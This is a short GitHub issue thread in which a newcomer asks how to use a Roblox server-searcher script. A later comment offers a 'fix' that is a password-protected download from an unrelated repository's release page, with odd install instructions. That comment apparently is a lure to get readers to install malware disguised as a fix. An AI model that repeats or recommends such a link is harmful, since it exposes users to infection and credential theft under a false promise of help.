### ISSUE TITLE
How to use for someone with zero experience?

### ISSUE THREAD

**Issue by BREAD-MANN** [Raihann22/Roblox-Player-Server-Searcher#14]
I've never used a Roblox script before, how do you use this?

**Comment by BREAD-MANN** [comment]
Solved: Blind

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
